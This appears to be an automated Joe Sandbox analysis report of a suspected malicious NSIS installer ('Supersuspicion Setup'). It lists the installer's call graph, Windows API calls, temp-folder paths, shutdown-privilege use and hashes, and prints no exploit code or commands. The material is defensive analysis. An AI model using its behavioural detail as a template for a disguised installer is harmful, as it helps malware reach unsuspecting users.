4515->4516 4517 4031c9 4516->4517 4517->4362 4518->4369 4520 4060b7 PeekMessageA 4519->4520 4521 4060c7 4520->4521 4522 4060ad DispatchMessageA 4520->4522 4521->4494 4522->4520 4524 402bcd 4523->4524 4525 402bcf MulDiv 4523->4525 4524->4525 4525->4496 4527 4031a4 4526->4527 4528 403069 4526->4528 4529 402bda 33 API calls 4527->4529 4541 4031cc SetFilePointer 4528->4541 4536 402f52 4529->4536 4531 403074 SetFilePointer 4535 403099 4531->4535 4532 4031b6 ReadFile 4532->4535 4534 402bda 33 API calls 4534->4535 4535->4532 4535->4534 4535->4536 4537 40312e WriteFile 4535->4537 4538 403185 SetFilePointer 4535->4538 4542 406161 4535->4542 4536->4511 4539 405a3f ReadFile 4536->4539 4537->4535 4537->4536 4538->4527 4540 402f6b 4539->4540 4540->4507 4540->4511 4541->4531 4543 406186 4542->4543 4546 40618e 4542->4546 4543->4535 4544 406215 GlobalFree 4545 40621e GlobalAlloc 4544->4545 4545->4543 4545->4546 4546->4543 4546->4544 4546->4545 4547 406295 GlobalAlloc 4546->4547 4548 40628c GlobalFree 4546->4548 4547->4543 4547->4546 4548->4547 4550 403a60 4549->4550 4567 405c94 wsprintfA 4550->4567 4552 403ad1 4553 405d58 18 API calls 4552->4553 4554 403add SetWindowTextA 4553->4554 4555 40380c 4554->4555 4556 403af9 4554->4556 4555->4394 4556->4555 4557 405d58 18 API calls 4556->4557 4557->4556 4568 404038 4558->4568 4560 40513b 4561 404038 SendMessageA 4560->4561 4563 40514d OleUninitialize 4561->4563 4562 405114 4562->4560 4571 401389 4562->4571 4563->4427 4565->4391 4566->4396 4567->4552 4569 404050 4568->4569 4570 404041 SendMessageA 4568->4570 4569->4562 4570->4569 4573 401390 4571->4573 4572 4013fe 4572->4562 4573->4572 4574 4013cb MulDiv SendMessageA 4573->4574 4574->4573 4575->4438 4577 403700 4576->4577 4578 4036c9 4577->4578 4579 403705 FreeLibrary GlobalFree 4577->4579 4580 4055f6 4578->4580 4579->4578 4579->4579 4581 4058b4 18 API calls 4580->4581 4582 405616 4581->4582 4583 405635 4582->4583 4584 40561e DeleteFileA 4582->4584 4586 405763 4583->4586 4620 405d36 
lstrcpynA 4583->4620 4585 4034d6 OleUninitialize 4584->4585 4585->4298 4585->4299 4586->4585 4591 40603a 2 API calls 4586->4591 4588 40565b 4589 405661 lstrcatA 4588->4589 4590 40566e 4588->4590 4592 405674 4589->4592 4593 40580d 2 API calls 4590->4593 4594 405787 4591->4594 4595 405682 lstrcatA 4592->4595 4597 40568d lstrlenA FindFirstFileA 4592->4597 4593->4592 4594->4585 4596 40578b 4594->4596 4595->4597 4598 4057c6 3 API calls 4596->4598 4597->4586 4602 4056b1 4597->4602 4599 405791 4598->4599 4601 4055ae 5 API calls 4599->4601 4600 4057f1 CharNextA 4600->4602 4603 40579d 4601->4603 4602->4600 4607 405742 FindNextFileA 4602->4607 4616 405703 4602->4616 4621 405d36 lstrcpynA 4602->4621 4604 4057a1 4603->4604 4605 4057b7 4603->4605 4604->4585 4610 40501f 25 API calls 4604->4610 4606 40501f 25 API calls 4605->4606 4606->4585 4607->4602 4609 40575a FindClose 4607->4609 4609->4586 4611 4057ae 4610->4611 4612 405bea 40 API calls 4611->4612 4615 4057b5 4612->4615 4614 4055f6 64 API calls 4614->4616 4615->4585 4616->4607 4616->4614 4617 40501f 25 API calls 4616->4617 4618 40501f 25 API calls 4616->4618 4619 405bea 40 API calls 4616->4619 4622 4055ae 4616->4622 4617->4607 4618->4616 4619->4616 4620->4588 4621->4602 4630 4059a2 GetFileAttributesA 4622->4630 4625 4055db 4625->4616 4626 4055d1 DeleteFileA 4628 4055d7 4626->4628 4627 4055c9 RemoveDirectoryA 4627->4628 4628->4625 4629 4055e7 SetFileAttributesA 4628->4629 4629->4625 4631 4055ba 4630->4631 4632 4059b4 SetFileAttributesA 4630->4632 4631->4625 4631->4626 4631->4627 4632->4631 4634 405a97 4633->4634 4635 405abd GetShortPathNameA 4633->4635 4658 4059c7 GetFileAttributesA CreateFileA 4634->4658 4637 405ad2 4635->4637 4638 405be4 4635->4638 4637->4638 4640 405ada wsprintfA 4637->4640 4638->4467 4639 405aa1 CloseHandle GetShortPathNameA 4639->4638 4641 405ab5 4639->4641 4642 405d58 18 API calls 4640->4642 4641->4635 4641->4638 4643 405b02 4642->4643 4659 4059c7 GetFileAttributesA CreateFileA 4643->4659 4645 405b0f 
4645->4638 4646 405b1e GetFileSize GlobalAlloc 4645->4646 4647 405b40 4646->4647 4648 405bdd CloseHandle 4646->4648 4649 405a3f ReadFile 4647->4649 4648->4638 4650 405b48 4649->4650 4650->4648 4660 40592c lstrlenA 4650->4660 4653 405b73 4655 40592c 4 API calls 4653->4655 4654 405b5f lstrcpyA 4656 405b81 4654->4656 4655->4656 4657 405bb8 SetFilePointer WriteFile GlobalFree 4656->4657 4657->4648 4658->4639 4659->4645 4661 40596d lstrlenA 4660->4661 4662 405975 4661->4662 4663 405946 lstrcmpiA 4661->4663 4662->4653 4662->4654 4663->4662 4664 405964 CharNextA 4663->4664 4664->4661 5279 10001058 5281 10001074 5279->5281 5280 100010dc 5281->5280 5282 100014bb GlobalFree 5281->5282 5283 10001091 5281->5283 5282->5283 5284 100014bb GlobalFree 5283->5284 5285 100010a1 5284->5285 5286 100010b1 5285->5286 5287 100010a8 GlobalSize 5285->5287 5288 100010b5 GlobalAlloc 5286->5288 5289 100010c6 5286->5289 5287->5286 5290 100014e2 3 API calls 5288->5290 5291 100010d1 GlobalFree 5289->5291 5290->5289 5291->5280 4705 403b19 4706 403b31 4705->4706 4707 403c6c 4705->4707 4706->4707 4710 403b3d 4706->4710 4708 403cbd 4707->4708 4709 403c7d GetDlgItem GetDlgItem 4707->4709 4712 403d17 4708->4712 4722 401389 2 API calls 4708->4722 4711 403fec 19 API calls 4709->4711 4713 403b48 SetWindowPos 4710->4713 4714 403b5b 4710->4714 4717 403ca7 SetClassLongA 4711->4717 4718 404038 SendMessageA 4712->4718 4736 403c67 4712->4736 4713->4714 4715 403b60 ShowWindow 4714->4715 4716 403b78 4714->4716 4715->4716 4719 403b80 DestroyWindow 4716->4719 4720 403b9a 4716->4720 4721 40140b 2 API calls 4717->4721 4744 403d29 4718->4744 4774 403f75 4719->4774 4723 403bb0 4720->4723 4724 403b9f SetWindowLongA 4720->4724 4721->4708 4725 403cef 4722->4725 4728 403c59 4723->4728 4729 403bbc GetDlgItem 4723->4729 4724->4736 4725->4712 4730 403cf3 SendMessageA 4725->4730 4726 40140b 2 API calls 4726->4744 4727 403f77 DestroyWindow EndDialog 4727->4774 4784 404053 4728->4784 4732 403bec 4729->4732 4733 403bcf 
SendMessageA IsWindowEnabled 4729->4733 4730->4736 4731 403fa6 ShowWindow 4731->4736 4737 403bf9 4732->4737 4739 403c40 SendMessageA 4732->4739 4740 403c0c 4732->4740 4748 403bf1 4732->4748 4733->4732 4733->4736 4735 405d58 18 API calls 4735->4744 4737->4739 4737->4748 4739->4728 4741 403c14 4740->4741 4742 403c29 4740->4742 4745 40140b 2 API calls 4741->4745 4746 40140b 2 API calls 4742->4746 4743 403c27 4743->4728 4744->4726 4744->4727 4744->4735 4744->4736 4747 403fec 19 API calls 4744->4747 4765 403eb7 DestroyWindow 4744->4765 4775 403fec 4744->4775 4745->4748 4749 403c30 4746->4749 4747->4744 4781 403fc5 4748->4781 4749->4728 4749->4748 4751 403da4 GetDlgItem 4752 403dc1 ShowWindow KiUserCallbackDispatcher 4751->4752 4753 403db9 4751->4753 4778 40400e KiUserCallbackDispatcher 4752->4778 4753->4752 4755 403deb EnableWindow 4758 403dff 4755->4758 4756 403e04 GetSystemMenu EnableMenuItem SendMessageA 4757 403e34 SendMessageA 4756->4757 4756->4758 4757->4758 4758->4756 4779 404021 SendMessageA 4758->4779 4780 405d36 lstrcpynA 4758->4780 4761 403e62 lstrlenA 4762 405d58 18 API calls 4761->4762 4763 403e73 SetWindowTextA 4762->4763 4764 401389 2 API calls 4763->4764 4764->4744 4766 403ed1 CreateDialogParamA 4765->4766 4765->4774 4767 403f04 4766->4767 4766->4774 4768 403fec 19 API calls 4767->4768 4769 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4768->4769 4770 401389 2 API calls 4769->4770 4771 403f55 4770->4771 4771->4736 4772 403f5d ShowWindow 4771->4772 4773 404038 SendMessageA 4772->4773 4773->4774 4774->4731 4774->4736 4776 405d58 18 API calls 4775->4776 4777 403ff7 SetDlgItemTextA 4776->4777 4777->4751 4778->4755 4779->4758 4780->4761 4782 403fd2 SendMessageA 4781->4782 4783 403fcc 4781->4783 4782->4743 4783->4782 4785 40406b GetWindowLongA 4784->4785 4795 4040f4 4784->4795 4786 40407c 4785->4786 4785->4795 4787 40408b GetSysColor 4786->4787 4788 40408e 4786->4788 4787->4788 4789 404094 SetTextColor 4788->4789 4790 40409e SetBkMode 4788->4790 
4789->4790 4791 4040b6 GetSysColor 4790->4791 4792 4040bc 4790->4792 4791->4792 4793 4040c3 SetBkColor 4792->4793 4794 4040cd 4792->4794 4793->4794 4794->4795 4796 4040e0 DeleteObject 4794->4796 4797 4040e7 CreateBrushIndirect 4794->4797 4795->4736 4796->4797 4797->4795 5299 402519 5300 4029e0 18 API calls 5299->5300 5304 402523 5300->5304 5301 40258d 5302 405a3f ReadFile 5302->5304 5303 40258f 5308 405c94 wsprintfA 5303->5308 5304->5301 5304->5302 5304->5303 5305 40259f 5304->5305 5305->5301 5307 4025b5 SetFilePointer 5305->5307 5307->5301 5308->5301 4824 40231c 4825 402322 4824->4825 4826 4029fd 18 API calls 4825->4826 4827 402334 4826->4827 4828 4029fd 18 API calls 4827->4828 4829 40233e RegCreateKeyExA 4828->4829 4830 402663 4829->4830 4831 402368 4829->4831 4832 402380 4831->4832 4833 4029fd 18 API calls 4831->4833 4834 40238c 4832->4834 4837 4029e0 18 API calls 4832->4837 4836 402379 lstrlenA 4833->4836 4835 4023a7 RegSetValueExA 4834->4835 4838 402f1f 46 API calls 4834->4838 4839 4023bd RegCloseKey 4835->4839 4836->4832 4837->4834 4838->4835 4839->4830 5309 40261c 5310 402637 5309->5310 5311 40261f 5309->5311 5313 4027bd 5310->5313 5315 405d36 lstrcpynA 5310->5315 5312 40262c FindNextFileA 5311->5312 5312->5310 5315->5313 5316 40499c GetDlgItem GetDlgItem 5317 4049ee 7 API calls 5316->5317 5359 404c06 5316->5359 5318 404a91 DeleteObject 5317->5318 5319 404a84 SendMessageA 5317->5319 5320 404a9a 5318->5320 5319->5318 5322 404ad1 5320->5322 5323 405d58 18 API calls 5320->5323 5321 404cea 5325 404d96 5321->5325 5330 404bf9 5321->5330 5335 404d43 SendMessageA 5321->5335 5324 403fec 19 API calls 5322->5324 5326 404ab3 SendMessageA SendMessageA 5323->5326 5329 404ae5 5324->5329 5327 404da0 SendMessageA 5325->5327 5328 404da8 5325->5328 5326->5320 5327->5328 5337 404dc1 5328->5337 5338 404dba ImageList_Destroy 5328->5338 5346 404dd1 5328->5346 5334 403fec 19 API calls 5329->5334 5331 404053 8 API calls 5330->5331 5336 404f8c 5331->5336 5332 404cdc SendMessageA 
5332->5321 5333 4048ea 5 API calls 5349 404c77 5333->5349 5350 404af3 5334->5350 5335->5330 5340 404d58 SendMessageA 5335->5340 5341 404dca GlobalFree 5337->5341 5337->5346 5338->5337 5339 404f40 5339->5330 5344 404f52 ShowWindow GetDlgItem ShowWindow 5339->5344 5343 404d6b 5340->5343 5341->5346 5342 404bc7 GetWindowLongA SetWindowLongA 5345 404be0 5342->5345 5351 404d7c SendMessageA 5343->5351 5344->5330 5347 404be6 ShowWindow 5345->5347 5348 404bfe 5345->5348 5346->5339 5358 40496a 4 API calls 5346->5358 5363 404e0c 5346->5363 5367 404021 SendMessageA 5347->5367 5368 404021 SendMessageA 5348->5368 5349->5321 5349->5332 5350->5342 5352 404bc1 5350->5352 5355 404b42 SendMessageA 5350->5355 5356 404b7e SendMessageA 5350->5356 5357 404b8f SendMessageA 5350->5357 5351->5325 5352->5342 5352->5345 5355->5350 5356->5350 5357->5350 5358->5363 5359->5321 5359->5333 5359->5349 5360 404f16 InvalidateRect 5360->5339 5361 404f2c 5360->5361 5369 4048a5 5361->5369 5362 404e3a SendMessageA 5366 404e50 5362->5366 5363->5362 5363->5366 5365 404ec4 SendMessageA SendMessageA 5365->5366 5366->5360 5366->5365 5367->5330 5368->5359 5372 4047e0 5369->5372 5371 4048ba 5371->5339 5373 4047f6 5372->5373 5374 405d58 18 API calls 5373->5374 5375 40485a 5374->5375 5376 405d58 18 API calls 5375->5376 5377 404865 5376->5377 5378 405d58 18 API calls 5377->5378 5379 40487b lstrlenA wsprintfA SetDlgItemTextA 5378->5379 5379->5371 5380 100010e0 5381 1000110e 5380->5381 5382 100011c4 GlobalFree 5381->5382 5383 100012ad 2 API calls 5381->5383 5384 100011c3 5381->5384 5385 10001266 2 API calls 5381->5385 5386 10001155 GlobalAlloc 5381->5386 5387 100011ea GlobalFree 5381->5387 5388 100011b1 GlobalFree 5381->5388 5389 100012d1 lstrcpyA 5381->5389 5383->5381 5384->5382 5385->5388 5386->5381 5387->5381 5388->5381 5389->5381 5390 4016a1 5391 4029fd 18 API calls 5390->5391 5392 4016a7 GetFullPathNameA 5391->5392 5393 4016be 5392->5393 5394 4016df 5392->5394 5393->5394 5397 40603a 2 API calls 5393->5397 5395 
402892 5394->5395 5396 4016f3 GetShortPathNameA 5394->5396 5396->5395 5398 4016cf 5397->5398 5398->5394 5400 405d36 lstrcpynA 5398->5400 5400->5394 5401 10002162 5402 100021c0 5401->5402 5404 100021f6 5401->5404 5403 100021d2 GlobalAlloc 5402->5403 5402->5404 5403->5402 5405 401d26 GetDC GetDeviceCaps 5406 4029e0 18 API calls 5405->5406 5407 401d44 MulDiv ReleaseDC 5406->5407 5408 4029e0 18 API calls 5407->5408 5409 401d63 5408->5409 5410 405d58 18 API calls 5409->5410 5411 401d9c CreateFontIndirectA 5410->5411 5412 4024cb 5411->5412 5413 40442a 5414 404456 5413->5414 5415 404467 5413->5415 5474 40552e GetDlgItemTextA 5414->5474 5417 404473 GetDlgItem 5415->5417 5418 4044d2 5415->5418 5421 404487 5417->5421 5419 4045b6 5418->5419 5428 405d58 18 API calls 5418->5428 5472 40475f 5418->5472 5419->5472 5476 40552e GetDlgItemTextA 5419->5476 5420 404461 5422 405fa1 5 API calls 5420->5422 5423 40449b SetWindowTextA 5421->5423 5426 40585f 4 API calls 5421->5426 5422->5415 5427 403fec 19 API calls 5423->5427 5425 404053 8 API calls 5430 404773 5425->5430 5431 404491 5426->5431 5432 4044b7 5427->5432 5433 404546 SHBrowseForFolderA 5428->5433 5429 4045e6 5434 4058b4 18 API calls 5429->5434 5431->5423 5438 4057c6 3 API calls 5431->5438 5435 403fec 19 API calls 5432->5435 5433->5419 5436 40455e CoTaskMemFree 5433->5436 5437 4045ec 5434->5437 5439 4044c5 5435->5439 5440 4057c6 3 API calls 5436->5440 5477 405d36 lstrcpynA 5437->5477 5438->5423 5475 404021 SendMessageA 5439->5475 5442 40456b 5440->5442 5445 4045a2 SetDlgItemTextA 5442->5445 5449 405d58 18 API calls 5442->5449 5444 4044cb 5447 406061 3 API calls 5444->5447 5445->5419 5446 404603 5448 406061 3 API calls 5446->5448 5447->5418 5455 40460b 5448->5455 5451 40458a lstrcmpiA 5449->5451 5450 404645 5478 405d36 lstrcpynA 5450->5478 5451->5445 5452 40459b lstrcatA 5451->5452 5452->5445 5454 40464e 5456 40585f 4 API calls 5454->5456 5455->5450 5460 40580d 2 API calls 5455->5460 5461 40469d 5455->5461 5457 404654 
GetDiskFreeSpaceA 5456->5457 5459 404676 MulDiv 5457->5459 5457->5461 5459->5461 5460->5455 5462 40470e 5461->5462 5464 4048a5 21 API calls 5461->5464 5463 404731 5462->5463 5465 40140b 2 API calls 5462->5465 5479 40400e KiUserCallbackDispatcher 5463->5479 5466 4046fb 5464->5466 5465->5463 5468 404710 SetDlgItemTextA 5466->5468 5469 404700 5466->5469 5468->5462 5470 4047e0 21 API calls 5469->5470 5470->5462 5471 40474d 5471->5472 5480 4043bf 5471->5480 5472->5425 5474->5420 5475->5444 5476->5429 5477->5446 5478->5454 5479->5471 5481 4043d2 SendMessageA 5480->5481 5482 4043cd 5480->5482 5481->5472 5482->5481 4167 40172c 4168 4029fd 18 API calls 4167->4168 4169 401733 4168->4169 4173 4059f6 4169->4173 4171 40173a 4172 4059f6 2 API calls 4171->4172 4172->4171 4174 405a01 GetTickCount GetTempFileNameA 4173->4174 4175 405a32 4174->4175 4176 405a2e 4174->4176 4175->4171 4176->4174 4176->4175 4177 401dac 4185 4029e0 4177->4185 4179 401db2 4180 4029e0 18 API calls 4179->4180 4181 401dbb 4180->4181 4182 401dc2 ShowWindow 4181->4182 4183 401dcd EnableWindow 4181->4183 4184 402892 4182->4184 4183->4184 4186 405d58 18 API calls 4185->4186 4187 4029f4 4186->4187 4187->4179 5483 401eac 5484 4029fd 18 API calls 5483->5484 5485 401eb3 5484->5485 5486 40603a 2 API calls 5485->5486 5487 401eb9 5486->5487 5489 401ecb 5487->5489 5490 405c94 wsprintfA 5487->5490 5490->5489 5491 40192d 5492 4029fd 18 API calls 5491->5492 5493 401934 lstrlenA 5492->5493 5494 4024cb 5493->5494 5495 4024af 5496 4029fd 18 API calls 5495->5496 5497 4024b6 5496->5497 5500 4059c7 GetFileAttributesA CreateFileA 5497->5500 5499 4024c2 5500->5499 5508 401cb0 5509 4029e0 18 API calls 5508->5509 5510 401cc0 SetWindowLongA 5509->5510 5511 402892 5510->5511 5512 401a31 5513 4029e0 18 API calls 5512->5513 5514 401a37 5513->5514 5515 4029e0 18 API calls 5514->5515 5516 4019e1 5515->5516 5517 401e32 5518 4029fd 18 API calls 5517->5518 5519 401e38 5518->5519 5520 40501f 25 API calls 5519->5520 5521 401e42 5520->5521 5522 

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Figure: control-flow graph; first block 403217-4032ae]
                                          APIs
                                          • #17.COMCTL32 ref: 00403238
                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403243
                                          • OleInitialize.OLE32(00000000), ref: 0040324A
                                            • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                            • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                            • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                          • SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,00000160,00000000,00000009), ref: 00403272
                                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                          • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000000), ref: 0040329A
                                          • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000020), ref: 004032C5
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
                                          • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
                                          • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
                                          • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
                                          • DeleteFileA.KERNELBASE(1033), ref: 00403428
                                          • OleUninitialize.OLE32(?), ref: 004034D6
                                          • ExitProcess.KERNEL32 ref: 004034F6
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000000,?), ref: 00403502
                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
                                          • DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,00424000,?), ref: 0040357A
                                          • CopyFileA.KERNEL32(C:\Users\user\Desktop\ulACwpUCSU.exe,0041E8B8,00000001), ref: 0040358E
                                          • CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
                                          • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000005,00000004), ref: 00403614
                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
                                          • ExitProcess.KERNEL32 ref: 0040368F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                          • String ID: "$"C:\Users\user\Desktop\ulACwpUCSU.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste$C:\Users\user\Desktop$C:\Users\user\Desktop\ulACwpUCSU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                          • API String ID: 4107622049-327368726
                                          • Opcode ID: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                          • Instruction ID: 3d26bb40307c87b2cd60c260c775e6d0301d96a10e68b952128d49a18977981a
                                          • Opcode Fuzzy Hash: 0e0f6a3637583670758f503623c3da15b8d87b56266dba0afd803753b1801d7b
                                          • Instruction Fuzzy Hash: 85B107706082517AE721AF659D8DA2B3EACEB41706F04447FF541BA1E2C77C9E01CB6E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Figure: control-flow graph; first block 40515d-405179]
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 004051BC
                                          • GetDlgItem.USER32(?,000003EE), ref: 004051CB
                                          • GetClientRect.USER32(?,?), ref: 00405208
                                          • GetSystemMetrics.USER32(00000002), ref: 0040520F
                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405230
                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405241
                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405254
                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405262
                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405275
                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405297
                                          • ShowWindow.USER32(?,00000008), ref: 004052AB
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052CC
                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052DC
                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052F5
                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405301
                                          • GetDlgItem.USER32(?,000003F8), ref: 004051DA
                                            • Part of subcall function 00404021: SendMessageA.USER32(00000028,?,00000001,00403E52), ref: 0040402F
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040531D
                                          • CreateThread.KERNEL32(00000000,00000000,Function_000050F1,00000000), ref: 0040532B
                                          • CloseHandle.KERNELBASE(00000000), ref: 00405332
                                          • ShowWindow.USER32(00000000), ref: 00405355
                                          • ShowWindow.USER32(?,00000008), ref: 0040535C
                                          • ShowWindow.USER32(00000008), ref: 004053A2
                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053D6
                                          • CreatePopupMenu.USER32 ref: 004053E7
                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004053FC
                                          • GetWindowRect.USER32(?,000000FF), ref: 0040541C
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405435
                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405471
                                          • OpenClipboard.USER32(00000000), ref: 00405481
                                          • EmptyClipboard.USER32 ref: 00405487
                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405490
                                          • GlobalLock.KERNEL32(00000000), ref: 0040549A
                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054AE
                                          • GlobalUnlock.KERNEL32(00000000), ref: 004054C7
                                          • SetClipboardData.USER32(00000001,00000000), ref: 004054D2
                                          • CloseClipboard.USER32 ref: 004054D8
                                          Strings
                                          • Supersuspicion Setup: Installing, xrefs: 0040544D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: Supersuspicion Setup: Installing
                                          • API String ID: 590372296-3553124451
                                          • Opcode ID: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                          • Instruction ID: 24acf85f457993e5d1a00f4a74fbc0a00d7f38a893508f9c9f1f5035b4e63235
                                          • Opcode Fuzzy Hash: 3e6425cd8027a1822d7c02b399c2ff8f99ecd6318ec4cf5a11e34b93871bf819
                                          • Instruction Fuzzy Hash: 5FA15BB1900208BFDB219FA0DD89AAE7F79FB08355F10407AFA04B61A0C7B55E51DF69

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Figure: control-flow graph; first block 405d58-405d63]
                                          APIs
                                          • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000), ref: 00405E09
                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E84
                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E97
                                          • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405ED3
                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405EE1
                                          • CoTaskMemFree.OLE32(00000000), ref: 00405EEC
                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F0E
                                          • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00405057,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000), ref: 00405F60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
